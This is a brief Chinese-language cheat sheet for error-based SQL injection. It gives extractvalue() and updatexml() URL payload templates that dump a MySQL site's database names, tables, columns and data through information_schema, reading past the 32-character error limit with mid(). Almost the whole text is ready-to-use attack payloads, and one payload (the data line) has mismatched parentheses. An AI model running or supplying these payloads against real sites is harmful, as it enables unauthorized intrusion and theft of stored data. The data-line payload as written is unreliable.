extractvalue(),最多显示32位
-
模版
http://url/?id=1 and (extractvalue(1,concat(0x7e,([code]),0x7e)))--+
在[code]处插入语句
-
库名
http://url/?id=1 and (extractvalue(1,concat(0x7e,(select group_concat(schema_name)+from+information_schema.schemata),0x7e)))--+
数据库名
因为限制了显示位数,所以未完全显示出所有数据库,使用截断,
http://url/?id=1 and (extractvalue(1,concat(0x7e,(select mid(group_concat(schema_name),32)+from+information_schema.schemata),0x7e)))--+
数据库名2
直到将所有数据库名全部显示,其他数据注入基本大致相同,如下。
-
表名
http://url/?id=1 and (extractvalue(1,concat(0x7e,(select mid(group_concat(table_name),1{截断})+from+information_schema.tables+where+table_schema={库名的16进制}),0x7e)))--+ -
列名
http://url/?id=1 and (extractvalue(1,concat(0x7e,(select mid(group_concat(column_name),1{截断})+from+information_schema.columns+where+table_name={表名的16进制}),0x7e)))--+ -
数据
http://url/?id=1 and (extractvalue(1,concat(0x7e,(select mid(group_concat({列})),1{截断})+from+库.表),0x7e)))--+ -
扩展
updatexml()的操作与extractvalue()基本一致,语句如下:http://url/?id=1 and (updatexml(1,concat(0x7e,([code]),0x7e),1))
